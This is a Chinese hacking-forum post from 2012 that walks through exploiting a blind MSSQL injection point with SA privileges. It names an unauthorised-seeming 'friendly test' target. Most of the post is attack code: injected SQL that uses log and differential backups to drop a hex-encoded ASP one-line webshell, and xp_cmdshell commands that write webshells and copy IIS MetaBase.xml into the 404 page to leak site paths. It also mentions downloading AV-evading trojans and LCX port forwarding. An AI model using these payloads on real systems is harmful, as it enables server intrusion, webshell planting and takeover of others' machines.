找回密码
 立即注册
查看: 2960|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————9 f& _( a! \* i

. |% T; |* G2 I  r& x
$ T4 ~4 D( k6 y- q3 _4 s! \/ J! k! s8 `                                                             欢迎高手访问指导,欢迎新手朋友交流学习。1 Z) Y- t, X6 ^/ z% i+ A) C

" Z, p* I4 U7 r! u$ ?                                                                 
7 b/ V1 V; d$ B8 V7 ~4 {# o2 ?# U                                                                 
4 `/ ~# X* ]8 {* L. V                                                                  论坛: http://www.90team.net/6 L# k3 M3 X8 T1 X8 L$ i
% ], E- S' i  k! W  P
; O; |  }: r% }1 ^9 Z8 g' o- J% N
" q& Z' m& q+ t9 G+ c
友情检测国家人才网
$ c6 H& A+ ?) a/ _+ I! {. `2 w( p/ l7 {  K# E8 T

) t  g# R$ l5 s+ }* e! t4 s内容:MSSQL注入SA权限不显错模式下的入侵$ c  z; p" k  I7 u$ [  n/ `0 G

; z- m  z9 _/ e5 U
; A& U" O  Z6 X/ i8 o+ T  ]! u9 }一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
8 t" J' A( w2 R0 R5 ~9 w
+ J9 R/ ^( E# L; W8 [- [我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。. D! T. I" t" b& l& `3 r
* M' A8 S  u4 q8 F9 q' ?& \

3 Y3 O+ v8 o+ ]( l这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
8 q1 Z3 l, M$ k; w7 Q1 n6 {, C4 e* T5 O+ B7 m" g) C, \
思路:3 d4 x9 Y3 @1 M; d; t3 ^

; }5 e1 M7 F. q7 F首先:7 y1 n& O, w* }; l7 m4 ~" J, D" y- ~
# n& v' X# F, G' e7 o! o3 Y
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。* `, }( M: O5 X/ r/ v3 \
1 U, t+ ?2 t, g
1.日志备份获得Webshell2 V0 o: ~5 V" @1 Y; o
* C. x+ x9 R, L7 n- _
2.数据库差异备份获得Webshell$ z9 B+ Q: E, n( u
3 t( M& Y, Q' L- h2 ^
4.直接下载免杀远控木马。
3 t- Y. O; L, g" D: X" v& f! _+ n6 Y, A% V
5.直接下载LCX将服务器端口转发出来$ d9 o; u) |* g# W8 K& U0 A8 n; f9 c

) M8 `9 [) b* z: Y6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
- P& G& P. l0 J# k" U/ U; J( c' ~9 t& u( q' `; i- D
  U0 s) m8 u  o1 b' ~
  c1 s8 P; j6 y' I$ E0 p4 g5 S
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
8 e; c5 [1 n9 v
& ]' W" E( O5 ~1 f我直接演示后面一个方法' \5 @% y% Q; R% g! Q0 k

: V( C/ j, s' M8 E7 q! A* Q6 L0 u0 y
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
; l9 u4 M0 }% C/ B
  U& V& v( f3 H/ B
+ q# V. P# z7 |! @5 N1 E8 H. a; m" T: q. C3 S

+ J& L) E! P' f/ g8 a  H◆日志备份:! U* A& b0 U6 b  d
" U' y0 @3 y" p' m4 t' j' h

6 G1 M& i) l0 J" b0 N8 h6 G1. 进行初始备份
) `' D8 b8 D$ _7 ~7 q; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
. c) M# J! G) ]/ C# |3 T- \6 L
1 Q. @* p) U9 q3 [; V2. 插入数据! d) o9 L. }3 X" [3 R% q
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
- x9 T5 l9 R% U, t( E, x' O' W- E& O' I
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
6 l, Q+ M; _2 }) |  e6 S. Z  - A# q- k, S6 [$ L
3. 备份并获得文件,删除临时表& s) [2 P" ]: o9 b/ W
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--0 k/ k1 w7 V# d" y# O
/ m, o( {6 ^4 R- v& M( Q) D/ {5 Y

6 @: H3 g5 Z. j# {! m  Z2 N! m* [5 k+ X2 B+ E& U" W' v( K% R1 n/ K8 J
◆数据库差异备份
7 V7 f' n% R# X$ }+ n8 i9 X9 a7 I
(1. 进行差异备份准备工作
2 L, c7 q2 b6 z
+ a# h. e, T4 w1 A8 {7 k* W7 b  B;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
0 b5 z0 ]# j' G& _+ m9 |4 i
! Z+ V- |6 W/ R/ {' i; A6 o上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
- A5 ]& y( F* D
7 Q( Y4 B1 }! q8 M% b0 |+ f( p  O( S2 |9 k7 L' G8 F  e0 \
(2. 将数据写入到数据库& T1 m" W) ^. M# m5 i
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- ' g. W4 H. N# W: o/ l

# G' g, G* Q% v: }0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
, D5 i9 \* r, \' Y8 u6 W$ x0 ]3 S4 [9 n5 _6 Z
3. 备份数据库并清理临时文件9 a5 ]2 M3 Z- T' J' H! U
) [: W% T6 I1 I
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--2 r: C, A6 @/ f. l. G& @1 w! p

; n$ Z) [0 @1 L# R0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
3 Q" M" ]* E. I2 |
9 m1 X% w2 d- L( G5 ?
& `5 d5 D. T: ~8 D( _2 l3 G/ p; k8 o0 M
用^转义字符来写ASP(一句话木马)文件的方法:   
9 p# [- M+ z0 K9 [5 n. u& G! ?  H2 E
! {6 a$ ?) s! K0 U, p, x4 [7 ~1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--0 K! X8 A! i. \5 Z

* Z* X: ~8 ]' D; T) @2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
( g+ H" r$ Q# G- `8 N: }1 q
+ j  Y# p7 g1 P% Z0 \读取IIS配置信息获取web路径
9 z6 y! |" Q. A- s3 z/ z
, k8 h. O; T( ^9 g* T9 s7 J     5 r6 K5 H$ T5 A) b
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--6 N/ z& X8 G$ j: T0 r

7 k# R; D- k5 ?: \执行命令
" G( |$ T& f! h     & ?# _; M5 n- Y/ l# x) I
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
! _( s+ C, ]/ I. g7 c: k8 g" q' T5 X4 H4 g8 Q( w  _

9 |) F* T" f4 |: e8 H
$ c1 I- @; ]- [$ q- f+ x
4 v) P  i2 x( H0 `* b, d1 v6 u7 F, I7 b

  k# E# d. R9 l- `; N& @, D- t/ F/ n# ~4 P$ g" G- S6 l
. T* M3 Q* Z$ y, u

# f* K6 p& {+ ~- G
0 \- }. c& T9 m3 C8 _
" b7 Y; Y$ [; ^- O. H! {9 a) }8 o  P; ^4 x

: q0 b( F3 U, x" I% T$ k
  A+ H' n7 ^) r2 B  y( o/ n
) |/ l% W7 }8 U4 e3 |
. W3 P9 L5 {+ ~& ^5 p% K0 l' H5 n' V: L. \6 |0 X
7 L. B+ W- ^' S1 G
* V8 `0 U5 O; u- l( r: y
; J7 a/ `$ ^+ l4 A. I/ c
$ ?' x" ?7 E: [  a# X8 \* d$ l6 B

! |0 S5 @8 p; A/ W7 E8 L& H! i+ q: f& ?3 o+ x" p; z4 x
, K, G% L# ~1 ?  @

, @; [4 \6 N. i& ~, K* W2 E$ H; ~7 _# N9 V
( d2 h( k* R+ r* G/ r
9 c$ E" c! M4 u+ `. U; V
- T, [- L! o7 v8 d& G" t7 i
: ]8 b/ r2 z, Q- C% q$ Q; ]

5 l+ r: i+ Q) m* Q  P, E4 r+ M( U2 t- D7 S: w+ A: `. a9 L! l
' T( E" ^  p! w8 W3 [
3 O& G2 V0 c7 s

) e% |5 k; Q2 H) s; J
: x  j% S4 M! w& i" R
* R6 v9 L1 [! Z1 w; B$ ?4 o
: I; K. N& f$ ?5 o2 S7 C& T+ T
" L3 x/ F1 s0 m( a* y2 }! ]" C' Q5 P

2 X3 _% E$ c! y* W- f1 R$ |
" L8 C, b! ^( i) Z4 o. u1 _3 h
( w4 w) A9 |, U* l7 |# ?, Y3 A7 M- {

3 N" S( e% T) U2 J
0 q# g) T" z* Z! i' C. h* v. D) k4 P* g) C
3 Q8 V1 H7 G; a; u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表